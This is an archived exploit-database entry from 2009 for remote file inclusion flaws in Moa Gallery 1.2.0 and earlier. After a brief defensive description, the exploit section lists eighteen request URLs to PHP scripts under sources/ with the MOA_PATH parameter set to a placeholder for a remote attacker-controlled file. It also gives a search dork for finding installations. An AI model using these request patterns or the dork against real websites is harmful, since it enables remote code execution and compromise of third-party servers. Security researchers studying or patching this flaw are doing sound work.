Moa Gallery <= 1.2.0 Multiple Remote File Inclusion Vulnerabilities

2009-08-26T00:00:00
ID 1337DAY-ID-5695
Type zdt
Reporter cr4wl3r
Modified 2009-08-26T00:00:00

Description

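Exploit in the web applications category (the listing does not specify a platform). The advisory below reports that the listed PHP scripts under sources/ in Moa Gallery <= 1.2.0 take a MOA_PATH request parameter that reaches a file-include path when the scripts are requested directly. The vulnerable code is not shown on this page. In legacy PHP applications this pattern usually depends on register_globals being enabled and on remote includes being permitted (allow_url_fopen / allow_url_include), so anyone assessing exposure should check those settings and whether sources/ is reachable over HTTP.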

                                        
                                            ===================================================================
Moa Gallery <= 1.2.0 Multiple Remote File Inclusion Vulnerabilities
===================================================================


$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
######################################################################
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
**********************************************************************
######################################################################
#[x] Moa Gallery <= 1.2.0 Multiple Remote File Inclusion Vulnerabilities
#[!] Download             :  http://sourceforge.net/projects/moagallery/files/                      		  
#[!] Author               :  cr4wl3r                                   		              		  
#[!] Location             :  Gorontalo - INDONESIA                     		  
#[!] Dork                 :  "Tanyakan Pada Rumput Yang Bergoyang"     		  
######################################################################

[x] 3xplo!t :                                                         		  
                                                                                  
http://localhost/[path]/sources/_error_funcs.php?MOA_PATH=[AvriLhea]
http://localhost/[path]/sources/_integrity_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/_template_component_admin.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/_template_component_gallery.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/_template_parser.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_gallery_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_image_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_tag_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_tag_view.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_upgrade_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_user_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_admin.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_gallery_add.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_gallery_view.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_image_add.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_image_view_full.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_login.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_sitemap.php?MOA_PATH=[AvriLhea]          

######################################################################
#[!] Greetz : MyMom [alm]  
#                                                                        
#[!] Special Thanks : str0ke, google, All MusLiM HacKers  
#
#[!] Thanks 2 : Irvian, xoron
#
#[!] SeLamaT MenuNaiKan IbaDah PuaSa RaMadHan 1430H                                              
######################################################################
**********************************************************************
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
######################################################################
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$


